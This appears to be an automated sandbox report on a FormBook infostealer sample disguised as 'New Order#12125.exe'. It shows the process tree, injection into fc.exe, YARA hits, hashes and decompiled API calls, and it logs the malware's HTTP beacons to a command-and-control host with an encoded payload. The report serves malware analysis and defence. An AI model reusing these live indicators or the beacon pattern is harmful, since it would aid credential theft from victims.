                                                                      Process:C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe
                                                                      Timestamp:Jan 13, 2025 15:15:05.942797899 CET
                                                                      Bytes transferred:1768
                                                                      Direction:OUT
                                                                      Data:
                                                                      POST /b9e2/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate
                                                                      Host: www.moyu19.pro
                                                                      Origin: http://www.moyu19.pro
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 1241
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.moyu19.pro/b9e2/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1


                                                                      Session ID:48
                                                                      Source IP:192.168.2.8
                                                                      Source Port:49757
                                                                      Destination IP:154.39.239.237
                                                                      Destination Port:80
                                                                      PID:1484
                                                                      Process:C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe
                                                                      Timestamp:Jan 13, 2025 15:15:08.480974913 CET
                                                                      Bytes transferred:480
                                                                      Direction:OUT
                                                                      Data:
                                                                      GET /b9e2/?60q4=KXKmlftrGUnNwN7yhNFRHhuh5Rs4DPRuyIFWo1edE1ybkp1zCkMUBe9/9dTIwO/9znAhfptP/ghbc5af4f99NOYW1ed+75fZ9khrC38pBidS91YBqsB3/Rw22POvSz2t7Q==&XxGx=INH0eLoh HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Host: www.moyu19.pro
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1


                                                                      Target ID:0
                                                                      Start time:09:11:09
                                                                      Start date:13/01/2025
                                                                      Path:C:\Users\user\Desktop\New Order#12125.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\Desktop\New Order#12125.exe"
                                                                      Imagebase:0x290000
                                                                      File size:333'824 bytes
                                                                      MD5 hash:2A0DFBFC319B0082F4FCDC47317E7F23
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.1802187865.0000000001470000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.1801757859.0000000000291000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.1805331540.00000000022F0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      Target ID:3
                                                                      Start time:09:11:41
                                                                      Start date:13/01/2025
                                                                      Path:C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe"
                                                                      Imagebase:0x10000
                                                                      File size:140'800 bytes
                                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3862461350.0000000003C00000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                      Reputation:high
                                                                      Has exited:false

                                                                      Target ID:4
                                                                      Start time:09:11:43
                                                                      Start date:13/01/2025
                                                                      Path:C:\Windows\SysWOW64\fc.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Windows\SysWOW64\fc.exe"
                                                                      Imagebase:0x6a0000
                                                                      File size:22'528 bytes
                                                                      MD5 hash:4D5F86B337D0D099E18B14F1428AAEFF
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3862175429.0000000003340000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3862316494.0000000003390000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3849108726.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                      Reputation:moderate
                                                                      Has exited:false

                                                                      Target ID:7
                                                                      Start time:09:11:56
                                                                      Start date:13/01/2025
                                                                      Path:C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe"
                                                                      Imagebase:0x10000
                                                                      File size:140'800 bytes
                                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:false

                                                                      Target ID:9
                                                                      Start time:09:12:09
                                                                      Start date:13/01/2025
                                                                      Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                      Imagebase:0x7ff6d20e0000
                                                                      File size:676'768 bytes
                                                                      MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                        Execution Graph

                                                                        Execution Coverage:1.1%
                                                                        Dynamic/Decrypted Code Coverage:5.3%
                                                                        Signature Coverage:8.3%
                                                                        Total number of Nodes:133
                                                                        Total number of Limit Nodes:7

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        [Control-flow graph beginning at block 2a8b13-2a8b4a; node and edge listing omitted]
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1801757859.0000000000291000.00000040.00000001.01000000.00000003.sdmp, Offset: 00290000, based on PE: true
                                                                        • Associated: 00000000.00000002.1801742280.0000000000290000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1801794724.00000000002D7000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_290000_New Order#12125.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: "$"
                                                                        • API String ID: 0-3758156766
                                                                        • Opcode ID: 063b6d386616b1ea3c6fec4a094d4e4aa879a73abadd00f48a304ef7574ee870
                                                                        • Instruction ID: 597b00814f423d6f858bd2cc59178251c85a144ff2369c413704465c10160402
                                                                        • Opcode Fuzzy Hash: 063b6d386616b1ea3c6fec4a094d4e4aa879a73abadd00f48a304ef7574ee870
                                                                        • Instruction Fuzzy Hash: C5F182B1D1021AAFDF24DF64CC85AEEB7B9AF45300F1481AAE509A7241DF709E55CFA0

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        [Control-flow graph beginning at block 291a99-291a9b; node and edge listing omitted]
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1801757859.0000000000291000.00000040.00000001.01000000.00000003.sdmp, Offset: 00290000, based on PE: true
                                                                        • Associated: 00000000.00000002.1801742280.0000000000290000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1801794724.00000000002D7000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_290000_New Order#12125.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: gfff$qi
                                                                        • API String ID: 0-3408824469
                                                                        • Opcode ID: 7157ea8d65efb368e5ae19fbb7d5438eca739491720f8a1a21171d374dfd349c
                                                                        • Instruction ID: 3098aa2d72323d695cd9d41d4e09c8e5000f06ab8e1f237282f52287ec362a40
                                                                        • Opcode Fuzzy Hash: 7157ea8d65efb368e5ae19fbb7d5438eca739491720f8a1a21171d374dfd349c
                                                                        • Instruction Fuzzy Hash: EFB1B1726652570FCF1ACE2E8C522A87B56EB52314F1852BED852CF2D3E1108D36C7C1

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 251 2a7ca3-2a7ccc call 2bf7e3 254 2a7cce-2a7cd1 251->254 255 2a7cd2-2a7ce0 call 2bfde3 251->255 258 2a7ce2-2a7ced call 2c0083 255->258 259 2a7cf0-2a7d01 call 2be283 255->259 258->259 264 2a7d1a-2a7d1d 259->264 265 2a7d03-2a7d17 LdrLoadDll 259->265 265->264
                                                                        APIs
                                                                        • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 002A7D15
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1801757859.0000000000291000.00000040.00000001.01000000.00000003.sdmp, Offset: 00290000, based on PE: true
                                                                        • Associated: 00000000.00000002.1801742280.0000000000290000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1801794724.00000000002D7000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_290000_New Order#12125.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Load
                                                                        • String ID:
                                                                        • API String ID: 2234796835-0
                                                                        • Opcode ID: a4c9aebcca78bf2c79862b32e3806d5fc13de4f3c4e116857794fabdc04dc3bf
                                                                        • Instruction ID: f7eaf8ff4e582baf085a3d275d358a229a0a1d522827b78d47167e743cc90cea
                                                                        • Opcode Fuzzy Hash: a4c9aebcca78bf2c79862b32e3806d5fc13de4f3c4e116857794fabdc04dc3bf
                                                                        • Instruction Fuzzy Hash: 01011EB5D1420EABDF10DBA4DD42FDEB778AF54304F0041A6E90897241FA31EB688B91

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 271 2bcb43-2bcb7f call 294903 call 2bdd73 NtClose
                                                                        APIs
                                                                        • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 002BCB7A
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1801757859.0000000000291000.00000040.00000001.01000000.00000003.sdmp, Offset: 00290000, based on PE: true
                                                                        • Associated: 00000000.00000002.1801742280.0000000000290000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1801794724.00000000002D7000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_290000_New Order#12125.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Close
                                                                        • String ID:
                                                                        • API String ID: 3535843008-0
                                                                        • Opcode ID: 4475380e52142e82ee3346c97f1c1c9fb8c96161e239dd7ee8ef83ea55ab2f30
                                                                        • Instruction ID: 004464765ef5c5be968dee328f557d98c24f4e6691ac0d318c40080eb47d9ce7
                                                                        • Opcode Fuzzy Hash: 4475380e52142e82ee3346c97f1c1c9fb8c96161e239dd7ee8ef83ea55ab2f30
                                                                        • Instruction Fuzzy Hash: BDE04672210644BBE620EA59DC02FDBB76CDFC5750F008555FA58A7242C670B9218BE0

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 285 1542b60-1542b6c LdrInitializeThunk
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 20f30e4b7cafd533dac918f6e76bb43cda8cc7ce23bf44c639bcdbcfe224c1ca
                                                                        • Instruction ID: c3f1ab954ab0669fce2e637d38d7f7984cb6b429c2f6d73565d12027c64adf95
                                                                        • Opcode Fuzzy Hash: 20f30e4b7cafd533dac918f6e76bb43cda8cc7ce23bf44c639bcdbcfe224c1ca
                                                                        • Instruction Fuzzy Hash: 8490026120240003424571598424616404AA7E0211B59C422F5014990DC56589916625
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 6957da4f0f4a614605283ed2a4a2e912a9db0f9ba09646c2105282a927e5f764
                                                                        • Instruction ID: ae7835c0abc37fb4ca6e2ae1ab23abc5050d91e321a25ad2815719b8653d95ae
                                                                        • Opcode Fuzzy Hash: 6957da4f0f4a614605283ed2a4a2e912a9db0f9ba09646c2105282a927e5f764
                                                                        • Instruction Fuzzy Hash: AD90023120140413D251715985147070049A7D0251F99C813B4424958DD6968A52A621

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 286 1542c70-1542c7c LdrInitializeThunk
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 60bf26d0be264ab906dcf47f1d84c6e4a2f7e74bd92d4f8cfd1af30db8c41a0d
                                                                        • Instruction ID: 7108b7be424c5f57785ed805eebff95032cac6fd076012b76cc38fab18b49d38
                                                                        • Opcode Fuzzy Hash: 60bf26d0be264ab906dcf47f1d84c6e4a2f7e74bd92d4f8cfd1af30db8c41a0d
                                                                        • Instruction Fuzzy Hash: A390023120148802D2507159C41474A0045A7D0311F5DC812B8424A58DC6D589917621
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 6c3fe2c9becd614b6b1bc02dad9edfe37dd68ae42eca81eb55d2f2d379966ea5
                                                                        • Instruction ID: 9a862733508b2763e59152d80e44f63bdb7c8e0fb002ac27219981ccee086967
                                                                        • Opcode Fuzzy Hash: 6c3fe2c9becd614b6b1bc02dad9edfe37dd68ae42eca81eb55d2f2d379966ea5
                                                                        • Instruction Fuzzy Hash: 1C90023160550402D240715985247061045A7D0211F69C812B4424968DC7D58A516AA2

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • PostThreadMessageW.USER32(17O3k-2I,00000111,00000000,00000000), ref: 002A456A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1801757859.0000000000291000.00000040.00000001.01000000.00000003.sdmp, Offset: 00290000, based on PE: true
                                                                        • Associated: 00000000.00000002.1801742280.0000000000290000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1801794724.00000000002D7000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_290000_New Order#12125.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: MessagePostThread
                                                                        • String ID: 17O3k-2I$17O3k-2I
                                                                        • API String ID: 1836367815-2455829943
                                                                        • Opcode ID: fcc73c7b8cc7b4af6ded3372faa6a9cb8a3cf5fe988ec8993084df4fd089c6da
                                                                        • Instruction ID: 7957e80ecebd91af813e848b80dca83b4e37129d648dc252c86f2ed3c3c904b5
                                                                        • Opcode Fuzzy Hash: fcc73c7b8cc7b4af6ded3372faa6a9cb8a3cf5fe988ec8993084df4fd089c6da
                                                                        • Instruction Fuzzy Hash: 911127B2D141497BDB10EBA08C81EEE7F7CEF41794F4440A9F954AB102D774CA168FA0

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • PostThreadMessageW.USER32(17O3k-2I,00000111,00000000,00000000), ref: 002A456A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1801757859.0000000000291000.00000040.00000001.01000000.00000003.sdmp, Offset: 00290000, based on PE: true
                                                                        • Associated: 00000000.00000002.1801742280.0000000000290000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1801794724.00000000002D7000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_290000_New Order#12125.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: MessagePostThread
                                                                        • String ID: 17O3k-2I$17O3k-2I
                                                                        • API String ID: 1836367815-2455829943
                                                                        • Opcode ID: 20b814a7f5afbd628b3306073f99bc8e32a910d4eb99ef896f182a05ec17f2cf
                                                                        • Instruction ID: 9038d518ebea99682e3ed67b36cfc42c659df444d197bedfdc288626cc02ef99
                                                                        • Opcode Fuzzy Hash: 20b814a7f5afbd628b3306073f99bc8e32a910d4eb99ef896f182a05ec17f2cf
                                                                        • Instruction Fuzzy Hash: 5B01D2B2D0024CBBDB10BBE08C82DEF7B7CDF41794F048065FA14A7101D6648E168FA1

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 41 2bceb3-2bcef4 call 294903 call 2bdd73 RtlFreeHeap
                                                                        APIs
                                                                        • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4), ref: 002BCEEF
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1801757859.0000000000291000.00000040.00000001.01000000.00000003.sdmp, Offset: 00290000, based on PE: true
                                                                        • Associated: 00000000.00000002.1801742280.0000000000290000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1801794724.00000000002D7000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_290000_New Order#12125.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FreeHeap
                                                                        • String ID: i*
                                                                        • API String ID: 3298025750-2343931300
                                                                        • Opcode ID: 4da538de4a336ad0334eb70f56b6e4fc79bf1a1573d1aefafb213d21a41e79ef
                                                                        • Instruction ID: b08f34db9ead4480954957ed0bea15e9736b871570c73024f566395d4ab33ce1
                                                                        • Opcode Fuzzy Hash: 4da538de4a336ad0334eb70f56b6e4fc79bf1a1573d1aefafb213d21a41e79ef
                                                                        • Instruction Fuzzy Hash: A0E06DB2604604BBD610EE58EC41FDB37ACEFC8750F004008F918A7242D771B9218BB4

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 266 2bce63-2bcea7 call 294903 call 2bdd73 RtlAllocateHeap
                                                                        APIs
                                                                        • RtlAllocateHeap.NTDLL(?,002AEA4E,?,?,00000000,?,002AEA4E,?,?,?), ref: 002BCEA2
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1801757859.0000000000291000.00000040.00000001.01000000.00000003.sdmp, Offset: 00290000, based on PE: true
                                                                        • Associated: 00000000.00000002.1801742280.0000000000290000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1801794724.00000000002D7000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_290000_New Order#12125.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocateHeap
                                                                        • String ID:
                                                                        • API String ID: 1279760036-0
                                                                        • Opcode ID: 3f90dd9010fafa6a22c10d148e61cf8cfc03c1fbbda787b6d6695d8e77fb27a4
                                                                        • Instruction ID: 39831f1e265dfecd99ca0bf45e456463c1223ad1bb4c71bae97decb8e7b0411b
                                                                        • Opcode Fuzzy Hash: 3f90dd9010fafa6a22c10d148e61cf8cfc03c1fbbda787b6d6695d8e77fb27a4
                                                                        • Instruction Fuzzy Hash: 72E06DB2214244BBD614EE58DC42EEB77ACEF88710F004049FA08A7242D770B921CBB4

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 276 2bcf03-2bcf38 call 294903 call 2bdd73 ExitProcess
                                                                        APIs
                                                                        • ExitProcess.KERNEL32(?,00000000,00000000,?,004D1854,?,?,004D1854), ref: 002BCF33
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1801757859.0000000000291000.00000040.00000001.01000000.00000003.sdmp, Offset: 00290000, based on PE: true
                                                                        • Associated: 00000000.00000002.1801742280.0000000000290000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1801794724.00000000002D7000.00000002.00000001.01000000.00000003.sdmp
                                                                        Similarity
                                                                        • API ID: ExitProcess
                                                                        • String ID:

                                                                        Control-flow Graph

                                                                        control_flow_graph 281 1542c0a-1542c0f 282 1542c11-1542c18 281->282 283 1542c1f-1542c26 LdrInitializeThunk 281->283
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: ApphelpCheckModule$Could not locate procedure "%s" in the shim engine DLL$LdrpGetShimEngineInterface$SE_DllLoaded$SE_DllUnloaded$SE_GetProcAddressForCaller$SE_InitializeEngine$SE_InstallAfterInit$SE_InstallBeforeInit$SE_LdrEntryRemoved$SE_LdrResolveDllName$SE_ProcessDying$SE_ShimDllLoaded$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                        Strings
                                                                        • @, xrefs: 015A6277
                                                                        • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlpSetPreferredUILanguages is not a valid multi-string!, xrefs: 015A5A84
                                                                        • @, xrefs: 015A63A0
                                                                        • PreferredUILanguages, xrefs: 015A63D1
                                                                        • @, xrefs: 015A61B0
                                                                        • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 015A5FE1
                                                                        • InstallLanguageFallback, xrefs: 015A6050
                                                                        • LanguageConfiguration, xrefs: 015A6420
                                                                        • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 015A635D
                                                                        • @, xrefs: 015A6027
                                                                        • PreferredUILanguagesPending, xrefs: 015A61D2
                                                                        • @, xrefs: 015A647A
                                                                        • Control Panel\Desktop, xrefs: 015A615E
                                                                        • LanguageConfigurationPending, xrefs: 015A6221
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlpSetPreferredUILanguages is not a valid multi-string!$@$@$@$@$@$Control Panel\Desktop$InstallLanguageFallback$LanguageConfiguration$LanguageConfigurationPending$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                                        Strings
                                                                        • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0157540A, 01575496, 01575519
                                                                        • Critical section address, xrefs: 01575425, 015754BC, 01575534
                                                                        • Thread is in a state in which it cannot own a critical section, xrefs: 01575543
                                                                        • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 015754E2
                                                                        • Thread identifier, xrefs: 0157553A
                                                                        • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 015754CE
                                                                        • 8, xrefs: 015752E3
                                                                        • Critical section address., xrefs: 01575502
                                                                        • undeleted critical section in freed memory, xrefs: 0157542B
                                                                        • Address of the debug info found in the active list., xrefs: 015754AE, 015754FA
                                                                        • corrupted critical section, xrefs: 015754C2
                                                                        • double initialized or corrupted critical section, xrefs: 01575508
                                                                        • Invalid debug info address of this critical section, xrefs: 015754B6
                                                                        • Critical section debug info address, xrefs: 0157541F, 0157552E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                        Strings
                                                                        • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01572498
                                                                        • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01572506
                                                                        • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01572624
                                                                        • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 015724C0
                                                                        • @, xrefs: 0157259B
                                                                        • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 015722E4
                                                                        • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01572602
                                                                        • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 015725EB
                                                                        • RtlpResolveAssemblyStorageMapEntry, xrefs: 0157261F
                                                                        • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01572409
                                                                        • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01572412
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
